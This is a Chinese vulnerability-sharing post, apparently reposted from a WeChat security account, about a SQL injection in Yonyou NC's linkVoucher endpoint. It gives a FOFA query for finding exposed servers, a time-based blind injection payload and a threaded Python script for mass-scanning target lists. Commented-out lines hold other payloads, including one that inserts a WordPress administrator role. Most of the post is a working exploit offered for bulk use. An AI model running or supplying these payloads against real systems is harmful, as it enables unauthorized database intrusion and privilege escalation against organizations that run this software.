fofa查询语句:
app="用友-UFIDA-NC"
利用脚本进行检测:
手工复现:
POC
/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'--
批量检测脚本
import requests import re import sys import urllib3 from argparse import ArgumentParser import threadpool from urllib import parse from time import time import random import os urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) url_list = [] file_name = '用友NC系统 linkVoucher sql注入' # fofa:app="用友-UFIDA-NC" def get_ua(): first_num = random.randint(55, 62) third_num = random.randint(0, 3200) fourth_num = random.randint(0, 140) os_type = [ '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(Macintosh; Intel Mac OS X 10_12_6)' ] chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] ) return ua proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} def wirte_targets(vurl, file_name): with open(file_name, "a+") as f: f.write(vurl + "\n") def check_file(filename): print('-------------------------------------------') file_path = f'{file_name}_vuln.txt' if os.path.isfile(file_path): print('存在漏洞的url如下~~~') with open(file_path, 'r') as file: lines = file.readlines() for line in lines: print(f'\033[32m{line.strip()}\033[0m') math_url = str(len(lines)) print('存在漏洞url:{}个'.format(math_url)) else: print('未发现漏洞!!!!') print('-------------------------------------------') def check_vuln(url): url = parse.urlparse(url) url1 = url.scheme + '://' + url.netloc vuln_url = f'{url[0]}://{url[1]}/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1\'waitfor+delay+\'0:0:5\'--' headers = { 'User-Agent': get_ua(), # 'SOAPAction': '', # 'Cache-Control': 'no-cache', # 'Upgrade-Insecure-Requests': '1', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', # 'Referer': f'http://{url[0]}://{url[1]}/wp-admin/plugins.php?plugin_status=all&paged=1&s', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', } # headers1 = { # 'User-Agent': get_ua(), # 'Accept': '*/*', # 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', # 'Accept-Encoding': 'gzip, deflate', # 'Content-Type': 'application/x-www-form-urlencoded', # 'Connection': 'close', # } # data = '''<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com"> # <soapenv:Header/> # <soapenv:Body> # <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> # <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId> # </ser:getUserNameById> # </soapenv:Body> # </soapenv:Envelope> # ''' # data1 = '''q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c''' # data2 = '''q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f''' try: res = requests.get(url=vuln_url, headers=headers, allow_redirects=False, timeout=15, verify=False) # res1 = requests.post(url=vuln_url, headers=headers, data=data1, allow_redirects=False, timeout=15, verify=False) # res2 = requests.post(url=vuln_url, headers=headers1, data=data2, allow_redirects=False, timeout=15, verify=False) # res_time = res.elapsed.total_seconds() if res_time >= 5: #and res_time >= 5 print('\033[32m[+]{} 延迟:{}秒\033[0m'.format(vuln_url,res_time))# 延迟:{}秒 wirte_targets(vuln_url+f' 延迟:{res_time}秒', f"{file_name}_vuln.txt") else: print("\033[34m[-]{} not vulnerable. {}\033[0m".format(url1, res.status_code)) except Exception as e: print("\033[31m[!]{} is timeout\033[0m".format(url1)) def multithreading(url_list, pools=5): works = [] for i in url_list: works.append(i) pool = threadpool.ThreadPool(pools) reqs = threadpool.makeRequests(check_vuln, works) [pool.putRequest(req) for req in reqs] pool.wait() if __name__ == '__main__': print(f"\n{file_name}\n ——————by hyuya~\n" f" ——————知识星球:大自然的nday搬运库(石占)") arg = ArgumentParser(description=f'{file_name}') arg.add_argument("-u", "--url", help="Target URL; Example:http://ip:port") arg.add_argument("-f", "--file", help="Target URL; Example:url.txt") args = arg.parse_args() url = args.url filename = args.file start = time() print('[*]任务开始...') if url != None and filename == None: # and cmd==None check_vuln(url) check_file(f'{file_name}_vuln.txt') elif url == None and filename != None: #and cmd==None for i in open(filename): i = i.replace('\n', '') url_list.append(i) multithreading(url_list, 10) end = time() print('任务完成,用时%d' % (end - start)) check_file(f'{file_name}_vuln.txt')
原文始发于微信公众号(Undoubted Security):【漏洞分享】用友 NC linkVoucher SQL注入 用友漏洞利用
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论